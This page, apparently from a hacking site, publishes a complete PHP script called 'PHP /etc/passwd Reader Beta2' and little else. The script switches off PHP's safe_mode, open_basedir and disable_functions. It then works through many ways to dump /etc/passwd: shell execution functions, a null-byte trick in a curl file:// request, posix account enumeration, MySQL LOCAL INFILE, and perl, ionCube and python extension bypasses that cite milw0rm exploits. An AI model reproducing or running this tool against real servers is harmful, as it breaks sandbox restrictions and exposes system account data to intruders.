#Home
|
#Search
|
#IRC(
WEB
/
Client
)
|
#MD5 Cracker
|
#Categories
|
#Links
|
#About
PHP /etc/passwd Reader Beta2
<?php // ====================================== // PHP /etc/passwd Reader Beta2 // Last modified: 2:16 PM 1/29/2010 // -------------------------------------- // Programmed by Hyp3rInj3cT10n // HTTP://Hyp3rInj3cT10n.GooglePages.Com // ====================================== ############################## # Configure Important Settings ############################## // Would you like to try generation of the /etc/passwd via user groups? // 1 = Yes (Default) // 0 = No $conf['groups'] = 1; // If the whole /etc/passwd can't be read, try getting // information on the following accounts (from the array). // If you do not wish to use this option, don't modify it. $conf['accounts'] = array(); // If you can access the MySQL database, enter the information below: $MySQL['host'] = 'localhost'; // Host (default: localhost) $MySQL['user'] = 'root'; // Username (default: root) $MySQL['pass'] = ''; // Password (default is none) $MySQL['db'] = ''; // Database name ############################## # DO NOT MODIFY THE CODE BELOW ############################## $IsCallableExt = create_function('$ext',' // function IsCallableExt($ext) // { echo "Trying via {$ext} extension..."; // Check whether this extension can be used if ( @extension_loaded($ext) ) { echo "extension loaded, trying..."; $ext = 1; // YAY, it has already been enabled! } else { echo "extension is off. Trying to load {$ext} extension..."; // We must try to enable it! if ( is_callable("dl") ) { @dl((PHP_SHLIB_SUFFIX === "dll" ? "php_" : "").$ext.".".PHP_SHLIB_SUFFIX); } // Check whether it worked if ( @extension_loaded("posix") ) { $ext = 1; // YAY, it worked! } } // } '); @ini_restore('safe_mode'); @ini_set('safe_mode',0); @ini_restore('open_basedir'); @ini_set('open_basedir',''); @ini_restore('disable_functions'); @ini_set('disable_functions',''); // Check whether ini_get() can be used if ( is_callable('ini_get') && ini_get('error_reporting') ) { $conf['safe_mode'] = ini_get('safe_mode'); } echo "Safe-Mode is ".($conf['safe_mode'] ? 'on' : 'off' )."<br />\r\n"; echo "Trying via backtick operator..."; if ( !$conf['safe_mode'] ) { $passwd = `cat /etc/passwd`; if ( $passwd ) { die("DONE!<br /><br /><br /><br />\r\n".nl2br($passwd)); } } echo "failed.<br />\r\nTrying via system()..."; $x = ''; if ( @system('ls',$x) ) { system('cat /etc/passwd',$passwd); if ( $passwd ) { die("DONE!<br /><br /><br /><br />\r\n".nl2br($passwd)); } } echo "failed.<br />\r\nTrying via shell_exec()..."; if ( @shell_exec('ls') ) { $passwd = shell_exec('cat /etc/passwd'); if ( $passwd ) { die("DONE!<br /><br /><br /><br />\r\n".nl2br($passwd)); } } echo "failed.<br />\r\nTrying via readfile()..."; if ( @readfile('/etc/passwd') ) { die(); } echo "failed.<br />\r\nTrying via file_get_contents()..."; if ( @is_readable('/etc/passwd') ) { $passwd = file_get_contents('/etc/passwd'); if ( $passwd ) { die("DONE!<br /><br /><br /><br />\r\n".nl2br($passwd)); } } echo "failed.<br />\r\nTrying via copy()..."; if ( is_callable('copy') ) { if ( @copy("compress.zlib:///etc/passwd",dirname($_SERVER['SCRIPT_FILENAME'])."/file.txt") ) { echo "go to: ".dirname($_SERVER['SCRIPT_FILENAME'])."/file.txt"; } } echo "failed.<br />\r\nTrying via CURL..."; if ( is_callable('curl_init') && is_callable('curl_exec') ) { $passwd = curl_init("file:///etc/passwd\x00".__FILE__); if ( curl_exec($passwd) ) { var_dump(curl_exec($passwd)); die(); } } echo "failed.<br />\r\n"; # --------------- # POSIX functions # --------------- if ( $IsCallableExt('posix') ) { echo "done.<br />\r\nTrying via posix_getpwuid()..."; // Check whether posix_getpwuid() can be used if ( is_callable('posix_getpwuid') ) { $passwd = array(); for ( $i=0; $i<5000;$i++ ) { $line = @posix_getpwuid($i); if ( $line ) { $passwd[$i] = $line; } } // Validate that everything is good if ( count($passwd) ) { die(implode("<br />\r\n",$passwd)); //Done, print it. } } echo "failed.<br />\r\nTrying via posix_getgrgid()..."; // Check whether posix_getgrgid() can be used if ( $conf['groups'] && is_callable('posix_getgrgid') ) { $passwd = array(); for ( $i=0; $i<5000;$i++ ) { $line = @posix_getgrgid($i); if ( $line ) { $passwd[$i] = $line; } } // Validate that everything is good if ( count($passwd) ) { die(implode("<br />\r\n",$passwd)); //Done, print it. } } echo "failed.<br />\r\nTrying via posix_getpwnam()..."; // Check whether posix_getpwnam() can be used if ( is_callable('posix_getpwnam') ) { $passwd = array(); foreach ( $conf['accounts'] as $account ) { $passwd[$account] = posix_getpwnam($account); } if ( count($passwd) ) { die(implode("<br />\r\n",$passwd)); //Done, print it. } } echo "failed.<br />\r\nTrying via posix_getgrnam()..."; // Check whether posix_getgrnam() can be used if ( $conf['groups'] && is_callable('posix_getgrnam') ) { $passwd = array(); foreach ( $conf['accounts'] as $account ) { $passwd[$account] = posix_getgrnam($account); } if ( count($passwd) ) { die(implode("<br />\r\n",$passwd)); //Done, print it. } } } echo "failed.<br />\r\n"; # ---------------------------------------- # MySQL Query (Local-Infile) # http://milw0rm.com/exploits/4392 # ---------------------------------------- echo "Trying via MySQL (LOCAL-INFILE)..."; if ( $MySQL['host'] && $MySQL['user'] && $MySQL['pass'] && $MySQL['db'] ) { mysql_connect($MySQL['host'],$MySQL['user'],$MySQL['pass']); mysql_select_db($MySQL['db']); mysql_query("CREATE TABLE adskfjlsdjf (a varchar(1024))"); mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE adskfjlsdjf"); $Query = mysql_query("SELECT a FROM adskfjlsdjf"); if ( mysql_num_rows($Query) ) { while ( $Row = mysql_fetch_row($Query) ) { echo implode('',$Row)."\r\n<br />"; } die(); } } echo "failed.<br />\r\n"; # ---------------------------------------- # Perl extension # http://milw0rm.com/exploits/4314 # ---------------------------------------- if ( $IsCallableExt('perl') ) { $perl = new perl(); die($perl->eval("system('cat /etc/passwd')")); } echo "failed.<br />\r\n"; # ------------------------------------------ # ionCube Loader extension # http://milw0rm.com/exploits/4517 # ------------------------------------------ if ( $IsCallableExt('ionCube Loader') ) { $passwd = @ioncube_read_file('/etc/passwd'); if ( $passwd ) { die(nl2br($passwd)); } } echo "failed.<br />\r\n"; # ------------------------------------------ # Python extension # http://milw0rm.com/exploits/7503 # ------------------------------------------ if ( $IsCallableExt('python') ) { $passwd = python_eval(" import os pwd = os.getcwd() print pwd os.system('cat /etc/passwd') "); if ( $passwd ) { die(nl2br($passwd)); } } echo "failed.<br />\r\n"; echo <<<END <br /><br /> Unable to read /etc/passwd, nothing worked.<br /> Try looking for new version at: <a href="http://hyp3rinj3ct10n.googlepages.com">http://hyp3rinj3ct10n.googlepages.com</a>. END; ?>
Back
Send all submissions to nullbyte.israel[at]gmail.com
Copyright © 2009 - 2010 | Queries: 4
